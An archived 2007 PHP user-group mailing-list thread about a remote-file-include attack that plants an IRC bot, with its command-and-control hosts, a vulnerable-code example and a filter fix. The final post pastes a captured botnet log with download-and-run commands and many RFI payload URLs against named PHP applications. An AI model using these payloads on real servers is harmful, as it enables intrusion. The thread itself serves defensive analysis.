[phpug] Hack attempt

37 views
Skip to first unread message

Nick Taylor

unread,
Oct 1, 2007, 11:53:20 PM10/1/07
to nzp...@googlegroups.com

Hello folks

Thought some of you might be interested in this

http://amyru.h18.ru/images/cs.txt

which is a php file that someone has tried to hack one of my sites with
as in

pageID=http://amyru.h18.ru/images/cs.txt


Any idea what this does?

Cameron Junge

unread,
Oct 1, 2007, 11:16:21 PM10/1/07
to nzp...@googlegroups.com
  
A quick perusal is that it's a trojan that allows remote commands.

It pings a remote host on a specific port I believe, which is probably a
trigger. It uses base64 and various obfuscation techniques to make it
difficult to reverse engineer it. Might have a look this arvo :)

Cameron


-----Original Message-----
From: nzp...@googlegroups.com [mailto:nzp...@googlegroups.com] On
Behalf Of Nick Taylor
Sent: Tuesday, 2 October 2007 4:53 p.m.
To: nzp...@googlegroups.com

Jochen Daum

unread,
Oct 1, 2007, 11:18:10 PM10/1/07
to nzp...@googlegroups.com
Hi,

He was just checking, if you go

fopen ($_GET['pageID']);

or if you compare it against a list fo allowed files or local files.

Does it open?

HTH, Jochen


razza

unread,
Oct 1, 2007, 11:22:04 PM10/1/07
to nzp...@googlegroups.com
Hmm shows why shared hosts should disable system, shell_exec, exec, etc..
ontop of running each virtualhost under their own userid/group.

Looks like it tries to make a simple webshell to me? no doubt as an attack
vector to compromise further.

Robert

On Tue, 02 Oct 2007 15:53:20 +1200, Nick Taylor wrote

> !DSPAM:4701b2ec185143497918079!


--

Cameron Junge

unread,
Oct 1, 2007, 11:57:50 PM10/1/07
to nzp...@googlegroups.com

Ah nice… has a built in IRC client that joins a channel (haven’t decoded that yet…)

 


Nick Taylor

unread,
Oct 2, 2007, 1:10:19 AM10/2/07
to nzp...@googlegroups.com
> He was just checking, if you go
>
> fopen ($_GET['pageID']);
>
> or if you compare it against a list fo allowed files or local files.
>
> Does it open?


Errm... I'm missing something.


What do I do with fopen($_GET['pageID']);

and

If I compare what agains a list of allowed or local files? pageID? If so
how?

For what it's worth, I force pageID to integer before it gets to any
other code.


Nick

Cameron Junge

unread,
Oct 2, 2007, 12:14:14 AM10/2/07
to nzp...@googlegroups.com
It's a PHP include attack. The purpose is to try & include a remote file
(in this case it's the bot file) and then it'll Trojan your machine.

A good reason to always filter input and escape output!

Cameron

-----Original Message-----
From: nzp...@googlegroups.com [mailto:nzp...@googlegroups.com] On
Behalf Of Nick Taylor
Sent: Tuesday, 2 October 2007 6:10 p.m.
To: nzp...@googlegroups.com

Jochen Daum

unread,
Oct 2, 2007, 12:15:40 AM10/2/07
to nzp...@googlegroups.com
Hi,

Thats what I expected. Some people might simply allow a file name that
they open without checking. I assumed it is a bot that just tries that.

HTH, Jochen

Dmitry Ruban

unread,
Oct 2, 2007, 12:30:09 AM10/2/07
to Nick Taylor
Hello Nick,

I did some research, seems that this is simple IRC client which connects
randomly to one of this hosts (port 8080):

we3nlethland.weedns.com
pmununvbernum.weedns.com
webnlhttp0x0.weedns.com
ns10.optus.nu
ns11.optus.nu
ns12.optus.nu
ns13.optus.nu
h0s0s00we0r0w0w.cjb.net
d0d0sjsdjkjkl2jsjkdfsdf.cjb.net
p3pweriouwer234234jkhkjhjkshda.cjb.net
02.privserver.com
p.myfoobar.info

joins channel ##p and listening for commands.


> Hello folks

> http://amyru.h18.ru/images/cs.txt

> pageID=http://amyru.h18.ru/images/cs.txt


--
Best regards,
Dmitry mailto:dmi...@ruban.biz

Jevon Wright

unread,
Oct 2, 2007, 4:23:05 PM10/2/07
to nzp...@googlegroups.com
This is where you get screwed:

vunerable.php
<?php
include($pageID . ".php");
// normal code...
?>

then all you have to call is /vunerable.php?pageID=http://evilsite.com/hack...

It's more common than you'd hope! Especially for help pages or index.php? type redirects...

Jevon

Nick

unread,
Oct 2, 2007, 4:26:34 PM10/2/07
to nzp...@googlegroups.com
Which would fail as that file doesn't exist....
http://amyru.h18.ru/images/cs.txt.php
gives me 404 when I type it in my browser
;-)

Nick

unread,
Oct 2, 2007, 4:35:19 PM10/2/07
to nzp...@googlegroups.com
Sorry - was thinking about this case which just happened - if the hacker
had the php file there then yea, but you'd also need to turn on remote
includes / allow remote includes wouldn't you?

Stig Manning

unread,
Oct 3, 2007, 9:16:37 PM10/3/07
to nzp...@googlegroups.com
If anyone is interested I have the de-obfuscated code (yeah I was
bored...). I will attempt to attach to this email, you can email me if
you want to get a copy otherwise.

I discovered that you cannot log in to the bots unless you have the
letters 'av' in your host name. He meant to make it so you couldn't log
in without having a host name ending in .av but failed in his regular
expression.

If you have 'av' anywhere in your hostname feel free to go and turn all
of his bots off ("d1enow" is the command)!

However be careful as I attempted to play around with the bots but got
found out pretty quick and then was DDoSd pretty hard.

Regards,
Stig


--
Stig Manning
BECom (Technology)
Lead Developer
Blink Interactive


The Loft, 201 Hobson St, Auckland
(09) 377 5663 / (021) 0331000
http://www.blinkinteractive.co.nz

cs.new.txt

razza

unread,
Oct 3, 2007, 9:26:37 PM10/3/07
to nzp...@googlegroups.com
How long did that take to decode?

On Thu, 04 Oct 2007 13:16:37 +1200, Stig Manning wrote

> !DSPAM:470430e1165791238162646!


--

Steven Morey

unread,
Oct 4, 2007, 7:09:09 PM10/4/07
to nzp...@googlegroups.com
Hello all,

I have got to a stage where I finally require some work to begin. The issue
is this is possible the most complicated stuff I have had built so I need
someone who has all round experience with coding.

A simple spec of what we need done is below:

Background on the current system.

Currently we provide an online postal system. Where we receive physical
letters. The letters can be controlled online. Such as forwarding to a new
physical location or destroyed.

The website is hosted on our VPS up in Auckland, and currently everything is
done online through our php scripts. Unfortunately my developer has left and
can't do any more work, so I need someone who has the expertise to develop
my system further.

Work that needs to be done.

We want to implement a mail scanning service. This is where instead of
actually forwarding the items, we scan the documents and the customer
receives the letters via email or through the online system. This can be in
PDF format or in JPG.

Now there are two options, where the images are read online thought our
secure web panel. Or they are simply emailed to the customer.

To be able to identify each scanned document when the email is sent or file
viewed the specific date must be passed to the customer (cost, no of pages
e.t.c..)

I want little admin time as possible, as this service may get very busy and
quick and accurate turnaround is very important!

Now as there are a few options I would like to consider the following
options:

A, use my copier 'scan to email' function. What it does is, when I hit the
scan button, the scanner will popup outlook and insert the image as a PDF.

This is great and simple but requires allot of admin, as I will have to
manually enter in the email address and the details of the scanned document.

C, Scan the documents and upload them to my server. The system can input
the data associated with the item to the user. It can either email the
images or post them in the customers secure account.

The issue I can see with this with this is uploading images to the server...
and will take some admin to locate the files once scanned and upload them.

D, This is the option I like... Develop a program that has access to my
scanner via the Twain protocol and also has SSL access to my DB. Thus it can
process the queue remotely on my pc, (I'll buy a UNIX box if you want it
done this way)

As the program has access to the DB, it can process it all for me like it is
currently done online. (Emailing it from the box or uploading to the members
area)

But there are two options for this...

1, The system will email the documents to the customer with the order info
in the email (user ID and cost e.t.c)

2, Set the box up as a content server, whereby instead of uploading directly
to the server (which takes time). The Box can be used as a content server
and the customer can read the mail online. Each time they login to the
account to access the PDF or JPG the online system will access my remote
server and download the remote files from my server at our office.

I know it may seem like a lot of work, but if someone who is competent in
this type of work can get back to me, I would very much appreciate it.

Cheers,
Steven Morey
Private Box

T:
+64 (0)4 831 1333

M:
+64 (0)21 937 600

E:
Ste...@privatebox.co.nz

W:
www.privatebox.co.nz

clip_image001.gif

Aaron Cooper

unread,
Oct 4, 2007, 9:14:23 PM10/4/07
to nzp...@googlegroups.com
Hi Steven,

"D, This is the option I like... Develop a program that has access to my
scanner via the Twain protocol and also has SSL access to my DB. Thus it can
process the queue remotely on my pc, (I'll buy a UNIX box if you want it
done this way)"

I think you might be better looking for a VB/C/.NET developer for this part
of the job. Java may be an option as I'm sure there's a Twain API available
for it.

Needless to say, I think you are looking for a stand-alone desktop app for
this (major) portion of the project. Not a web technology like PHP.

The linking of documents to user accounts could be resonably acheived with a
good naming convention and have your new site poll a certain directory(ies)
and take action on files based on user id/name etc.

Regards
Aaron

Julian Melville

unread,
Oct 4, 2007, 9:17:33 PM10/4/07
to nzp...@googlegroups.com
> Needless to say, I think you are looking for a stand-alone desktop app
> for this (major) portion of the project. Not a web technology like PHP.

Yep. This, for example: http://www.ezescan.com.au/

From the sound of what you were describing, it sounds like a good fit.

Cheers,

Julian.

Lee Aholima

unread,
Oct 5, 2007, 5:35:27 AM10/5/07
to nzp...@googlegroups.com
How do you intend reading the details of the person you are sending this
mail to from the physical mail (envelope) ? OCR? Do you have some code for
this or software plugin to do this?

Regards
L

----- Original Message -----
From: "Steven Morey" <st...@morey.co.nz>
To: <nzp...@googlegroups.com>
Sent: Friday, October 05, 2007 12:09 PM
Subject: [phpug] Job Quote Request.

steven morey

unread,
Oct 5, 2007, 5:53:05 AM10/5/07
to nzp...@googlegroups.com
Hello there,

OCR is not an option, as its inaccurate and will not read hand writing.
there are many plugins for this type of job. it's just which one suits the
developer.

Cheers,

Steven.

Lee Aholima

unread,
Oct 5, 2007, 5:56:21 AM10/5/07
to nzp...@googlegroups.com
Hi Steven,

Assuming that you have something to read the customer details from the
envelope (OCR)?

I think it is possible to do this using the following setup...

Microsoft Access.
Twain api (dll).
SQL Server express (email via smtp dll) - you just need to provide a smtp
server.
you could probably convert to pdf as well

With microsoft access I think from memory if you don't have it you can
purchase/install a runtime engine to run your microsoft access application
rather than having microsoft access.

I have worked with something similar at a company I worked for in the past
and did a proof of concept not so long ago converting invoices
electronically generated, to pdf and emailing them via smtp, for another
customer. He went broke and owed me money for this so I never got to test
out the application in a live environment.


----- Original Message -----
From: "Steven Morey" <st...@morey.co.nz>
To: <nzp...@googlegroups.com>
Sent: Friday, October 05, 2007 12:09 PM
Subject: [phpug] Job Quote Request.

Lee Aholima

unread,
Oct 5, 2007, 6:00:41 AM10/5/07
to nzp...@googlegroups.com
Let me know if with a bit of tweaking this is something you might be looking
for.

Regards
L

----- Original Message -----
From: "Lee Aholima" <lee-a...@dayfive.co.nz>
To: <nzp...@googlegroups.com>

Sent: Friday, October 05, 2007 10:56 PM
Subject: [phpug] Re: Job Quote Request.


>

Nick Taylor

unread,
Oct 3, 2007, 11:49:35 PM10/3/07
to nzp...@googlegroups.com

Ha ha - fantastic. I tried this myself and got as far as the trim()
function... and then had a sort of existential crisis so left it at that.

> ------------------------------------------------------------------------
>
> No virus found in this incoming message.
> Checked by AVG Free Edition.
> Version: 7.5.488 / Virus Database: 269.14.0/1048 - Release Date: 03/10/2007 20:22

Richard Vowles

unread,
Oct 7, 2007, 4:58:27 PM10/7/07
to nzp...@googlegroups.com
Lee Aholima wrote:
>
> Hi Steven,
>
> Assuming that you have something to read the customer details from the
> envelope (OCR)?
>
> I think it is possible to do this using the following setup...
>
> Microsoft Access.
> Twain api (dll).
> SQL Server express (email via smtp dll) - you just need to provide a
> smtp server.
> you could probably convert to pdf as well
>
> With microsoft access I think from memory if you don't have it you can
> purchase/install a runtime engine to run your microsoft access
> application rather than having microsoft access.
You do however have to purchase the MOD (microsoft office developer)
package. Really, VS.NET or Delphi is the way to go with this, steer well
clear of Access, it is an end-user querying tool not a software
development tool.

Richard

richard.vcf

Steven Morey

unread,
Oct 7, 2007, 6:12:51 PM10/7/07
to nzp...@googlegroups.com
Hello there,

Thank you all for your input.

I have taken all your suggestions into consideration, as I have a current
system I have been advised to re-write the entire thing.

Whilst this may seem appealing to anyone who wishes to work on it, I am
unsure if I want to go though the whole process of getting my program
re-written.

I feel that the best option may be a desktop application that downloads the
processing information, scans the documents and emails the PDF documents to
the customer Via my SMTP server. I do not want to consider OCR as it is
complicated and unreliable.

My preference is for someone in Wellington, and I want to get this job
underway and completed before the years end. so please let know know if your
keen.

Cheers,
Steven Morey
Private Box

E:
Ste...@privatebox.co.nz

W:
www.privatebox.co.nz


----- Original Message -----
From: "Richard Vowles" <ric...@developers-inc.co.nz>
To: <nzp...@googlegroups.com>
Sent: 8 October 2007 9:58 AM
Subject: [phpug] Re: Job Quote Request.

clip_image001.gif

Nick

unread,
Oct 7, 2007, 10:02:41 PM10/7/07
to nzp...@googlegroups.com
Hi there,

Anyone have any recommendations for a PHP OOP book / e-course / video set?

Cheers
:-)

anru chen

unread,
Oct 7, 2007, 10:08:46 PM10/7/07
to nzp...@googlegroups.com
have not read this book, probably will buy it later,

http://www.amazon.com/PHP-5-Objects-Patterns-Practice/dp/1590593804,
viewer comments seems really good.

regards.

Grant Paton-Simpson

unread,
Oct 7, 2007, 10:17:02 PM10/7/07
to nzp...@googlegroups.com
I have that book and it is brilliant. I am still reading/re-reading it
and there is a lot in there.

--
___________________________________

Dr Grant Paton-Simpson
Director, Paton-Simpson & Associates Ltd

www.p-s.co.nz

16 Summit Drive, Mt Albert, Auckland 1025

(09) 849-6696
(09) 849-6699


___________________________________


an...@dandydesigns.co.nz

unread,
Oct 7, 2007, 10:28:43 PM10/7/07
to nzp...@googlegroups.com
I liked
http://www.amazon.com/Power-Programming-Bruce-Perens-Source/dp/013147149X

it's available for free download on pdf, just google for it.

Aaron Cooper

unread,
Oct 7, 2007, 11:56:18 PM10/7/07
to nzp...@googlegroups.com
I have this too. Highly reccommend it.

I lent it to a colleage who was a PHP novice (actionscript developer) and
his exact words were "very easy to follow".

Aaron

Trevor Ulyatt

unread,
Oct 8, 2007, 1:54:44 PM10/8/07
to nzp...@googlegroups.com
This is true, and here is the URL for it -
http://www.takhleeq.net/download/013147149X_book.pdf

-----Original Message-----
From: nzp...@googlegroups.com [mailto:nzp...@googlegroups.com] On

Behalf Of An...@DandyDesigns.co.nz
Sent: 8 October 2007 3:29 p.m.
To: nzp...@googlegroups.com
Subject: [phpug] Re: Decent PHP OOP books

Nick

unread,
Oct 8, 2007, 3:41:48 PM10/8/07
to nzp...@googlegroups.com
Hi there,

Yea I found this yesterday and started reading it - already picked up a
couple of really simple things which are useful

Thanks for that :-)

lee-a...@dayfive.co.nz

unread,
Oct 9, 2007, 12:10:09 AM10/9/07
to nzp...@googlegroups.com
Hi Steven,

Just one question - how would you obtain the addressee information from
the envelope. Okay so scanning the letter or posted document would deal
with getting an electronic copy of the letter (document) but how would you
be able to obtain the addressee (sender too?) if you are not using OCR?
This is the bit that I don't understand assuming that the mail is a
physical envelope etc.

Regards
Lee Aholima
Mob 027 4313292

Steven Morey

unread,
Oct 9, 2007, 2:34:41 AM10/9/07
to nzp...@googlegroups.com
Hello there,

With the existing system we manually type this in. They can already see
their mail in itemsed format.

I think we have found a Plugin that will be suited to our needs, the only
issues is finding someone who is able to write the php for it.

Cheers,
Steven.

brianegge

unread,
Oct 17, 2007, 8:40:54 AM10/17/07
to NZ PHP Users Group
I've been getting a lot of these 'amyru' irc bot attacks lately. They
must be effective, as they keep repeating. My shared host has
SecFilterEngine on by default, which will stop the script dead.
Unfortunately, I maintain a wiki of code tips, and I often have to
include commands in my code. So, I've turned off SecFilterEngine. I
found I could add this to my LocalSettings.php, and it seem to prevent
the bad URLS.

//http and https should not be used in any query string
if (eregi('http', $_SERVER['QUERY_STRING']) || eregi('https',
$_SERVER['QUERY_STRING'])) {
header('Location: http://' . $_SERVER['SERVER_NAME']);
exit;
}

I'm surprised that I'm getting an attack, as I'm running PHP 5.2.3 and
MediaWiki 1.10.1. My host seems to have the other things you expect
like allow_url_fopen turned off.

Any ideas on how to further protect my site?

Ivan

unread,
Nov 1, 2007, 5:50:44 PM11/1/07
to NZ PHP Users Group
Hi!

I've managed to capture something ;)
This session was captured between 31.10.07 to 01.11.07.

NOTE: I'm leaving all ip's (except mine) untouched, in hope their
admins will see it and clean their servs.

These peoples probably responsible for all scans and attacks, in which
"*.h18.ru/images/cs.txt" was seen.

Here we go:

--------- START ---------------

xx.xx.xx.xx.xxxx-202.181.099.073.xxxx: JOIN ##p md5hash
MODE gagaqgwia -x i
JOIN ##p md5hash
202.181.099.073.xx.xx.xx.xx.54658: :gfefshea!qtyarjtrk@***hi!
***it's****me**** JOIN :##p
202.181.099.073.xx.xx.xx.xx.54658: :w!0...@nav.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :w!0...@nav.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :w!0...@nav.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Quit:
connection reset by queer
202.181.099.073.xx.xx.xx.xx.54658: :w!0...@nav.av QUIT :Killed (db (rat))
<====== pls, note this ;)
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Ping timeout
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Ping timeout
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Ping timeout
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*get
http://membres.lycos.fr/x03/g.txt /var/tmp/g.php -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*get
http://membres.lycos.fr/x03/a.txt /var/tmp/a.php -s
:db!0x...@n.av PRIVMSG ##p :*get http://membres.lycos.fr/x03/m.txt /
var/tmp/m.php -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*chmod /
var/tmp/g.php +x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*chmod /
var/tmp/a.php +x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*chmod /
var/tmp/m.php +x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "Powered+by+SocketMail" /mail/content/fnc-
readmail3.php?__SOCKETMAIL_ROOT=http://holegirl.h18.ru/images/cs.txt?
5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Ping timeout
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php "Powered+by+phpFaber+URLInn" /urlinn_includes/
config.php?dir_ws=http://holegirl.h18.ru/images/cs.txt? 5 8 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php main.php? /pages/main.php?pg=http://holegirl.h18.ru/
images/cs.txt? 5 90 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/a.php main.php? /pages/
main.php?pg=http://holegirl.h18.ru/images/cs.txt? 5 90 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/g.php inurl:main.php?
pg= /pages/main.php?pg=http://holegirl.h18.ru/images/cs.txt? 5 9 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :cmd
php /var/tmp/m.php "Sistema+Integral+de+Gestion" /inc/sige_init.php?
SYS_PATH=http://holegirl.h18.ru/images/cs.txt? 5 90 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :cmd
php /var/tmp/m.php Sistema+Integral+de+Gestion /inc/sige_init.php?
SYS_PATH=http://holegirl.h18.ru/images/cs.txt? 5 90 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php breadcrumb.php? /_theme/breadcrumb.php?
rootBase=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php breadcrumb.php? /_theme/breadcrumb.php?
rootBase=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/g.php inurl:_theme/
breadcrumb.php?rootBase= /_theme/breadcrumb.php?rootBase=http://
holegirl.h18.ru/images/cs.txt? 5 5 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php Powered+by+CaupoShop+Pro /shop/index.php?
action=http://holegirl.h18.ru/images/cs.txt? 5 2 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php Powered+by+CaupoShop+Pro /shop/index.php?
action=http://holegirl.h18.ru/images/cs.txt? 5 90 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php Powered+by
+CaupoShop+Pro /shop/index.php?action=http://holegirl.h18.ru/images/
cs.txt? 5 5 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "Powered+by+CaupoShop+Pro" /shop/index.php?
action=http://holegirl.h18.ru/images/cs.txt? 5 5 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php intitle:Powered+by+CaupoShop+Pro /shop/index.php?
action=http://holegirl.h18.ru/images/cs.txt? 5 2 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php intitle:CaupoShop+Pro /shop/index.php?action=http://
holegirl.h18.ru/images/cs.txt? 5 2 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php intitle:CaupoShop+Pro /shop/index.php?action=http://
holegirl.h18.ru/images/cs.txt? 5 8 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php phpSecurePages /phpSecurePages/secure.php?
&cfgProgDir&cmd=wget%20http://holegirl.h18.ru/images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php phpSecurePages /
phpSecurePages/secure.php?&cfgProgDir&cmd=wget%20http://
holegirl.h18.ru/images/cs.txt? 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/a.php phpSecurePages /
phpSecurePages/secure.php?&cfgProgDir&cmd=wget%20http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php "BosMarket+." /bosmarket/account.php?
newEmail=http://holegirl.h18.ru/images/cs.txt? 5 5 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "BosMarket+." /bosmarket/account.php?
newEmail=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/a.php "BosMarket+." /
bosmarket/account.php?newEmail=http://holegirl.h18.ru/images/cs.txt? 5
50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php "IndyLANDLORD" /IndyLANDLORD/2_bedroom.php?
page=http://holegirl.h18.ru/images/cs.txt? 5 5 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php "IndyLANDLORD" /
IndyLANDLORD/2_bedroom.php?page=http://holegirl.h18.ru/images/cs.txt?
5 60 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/a.php "IndyLANDLORD" /
IndyLANDLORD/2_bedroom.php?page=http://holegirl.h18.ru/images/cs.txt?
5 60 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php Copyright+..+2001-2007+awzMB+Project /awzmb/modules/
reg.incl.php?Setting[OPT_includepath]=http://holegirl.h18.ru/images/
cs.txt? 5 50
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php Copyright+..
+2001-2007+awzMB+Project /awzmb/adminhelp.php?
Setting[OPT_includepath]=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/g.php Copyright ..
2001-2007 awzMB Project /awzmb/adminhelp.php?
Setting[OPT_includepath]=http://holegirl.h18.ru/images/cs.txt? 5 5 -s
085.064.207.012.52670-202.181.099.073.08081: PRIVMSG ##p :> [EOF]
202.181.099.073.xx.xx.xx.xx.54658: :ezvgmgpku!
pdac...@www.dataflo.net PRIVMSG ##p :> [EOF]
:nhffzoksk!xiig...@212.100.248.138 PRIVMSG ##p :> Status: 404
:wavfuszwg!tgqu...@devel.money.net PRIVMSG ##p :> Could not open
input file: /var/tmp/a.php.
:wdxdmvryh!jgiu...@2novgroup.com PRIVMSG ##p :> Status: 404
:wavfuszwg!tgqu...@devel.money.net PRIVMSG ##p :> [EOF]
:nhffzoksk!xiig...@212.100.248.138 PRIVMSG ##p :> Content-type: text/
html
:wdxdmvryh!jgiu...@2novgroup.com PRIVMSG ##p :> Content-type: text/
html
:nhffzoksk!xiig...@212.100.248.138 PRIVMSG ##p :> X-Powered-By: PHP/
4.3.2
202.181.099.073.xx.xx.xx.xx.54658: :wdxdmvryh!jgiu...@2novgroup.com
PRIVMSG ##p :> X-Powered-By: PHP/4.3.9
:nhffzoksk!xiig...@212.100.248.138 PRIVMSG ##p :> No input file
specified.
:wdxdmvryh!jgiu...@2novgroup.com PRIVMSG ##p :> No input file
specified.
202.181.099.073.xx.xx.xx.xx.54658: :nhffzoksk!
xiig...@212.100.248.138 PRIVMSG ##p :> [EOF]
:wdxdmvryh!jgiu...@2novgroup.com PRIVMSG ##p :> [EOF]
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "Copyright+..+2001-2007+awzMB+Project" /awzmb/
adminhelp.php?Setting[OPT_includepath]=http://holegirl.h18.ru/images/
cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "Copyright+..+2001-2007+awzMB+Project" /awzmb/
adminhelp.php?Setting[OPT_includepath]=http://holegirl.h18.ru/images/
cs.txt? 5 50 -s

======= OP wars? ;) Goooood! ===============>
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p : ( ely
magers / owner of glowshells.net)
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p : ( ely
magers / owner of glowshells.net is the one whos owned you)
202.181.099.073.xx.xx.xx.xx.54658: :w345!0@0 PRIVMSG ##p :drew basile
202.181.099.073.xx.xx.xx.xx.54658: :w345!0@0 PRIVMSG ##p :you are
stupid
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :hahaha
202.181.099.073.xx.xx.xx.xx.54658: :w345!0@0 TOPIC ##p :
202.181.099.073.xx.xx.xx.xx.54658: :w345!0@0 PRIVMSG ##p :andrew is
fucker
202.181.099.073.xx.xx.xx.xx.54658: :w345!0@0 QUIT :Killed (db (your-
dead))
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p : ( ely
magers / owner of glowshells.net is the one whos owned you)
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :*
202.181.099.073.xx.xx.xx.xx.54658: :w34534!0@0 TOPIC ##p :
202.181.099.073.xx.xx.xx.xx.54658: :w34534!0@0 PRIVMSG ##p :andrew
basile is owner of this botnet
202.181.099.073.xx.xx.xx.xx.54658: :w34534!0@0 PRIVMSG ##p :he lives
in melbourne aussie
202.181.099.073.xx.xx.xx.xx.54658: :w34534!0@0 PRIVMSG ##p :get his
ass.
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p :
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :grrr
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :now
your fucking dead.
202.181.099.073.xx.xx.xx.xx.54658: :w34534!0@0 QUIT :Quit: coding.
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p :(ely
magers / owner of glowshells.net is the one whos owned you)
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p :
<=========== OP wars End... Bad... ============

202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php Powered+by+CaupoShop+Pro /shop/index.php?
action=http://holegirl.h18.ru/images/cs.txt? 5 90 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php LimeSurvey /classes/core/language.php?
rootdir=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php You+have+not+provided+a+survey+identification
+number /classes/core/language.php?rootdir=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "PHPDJ+was+created+by+www.php-mania.co.uk" /
PHPDJ_v05/dj/djpage.php?page=http://holegirl.h18.ru/images/cs.txt? 5
50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php "PHPDJ+was+created+by+www.php-mania.co.uk" /
PHPDJ_v05/dj/djpage.php?page=http://holegirl.h18.ru/images/cs.txt? 5
50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php "awzMB+Project" /
awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
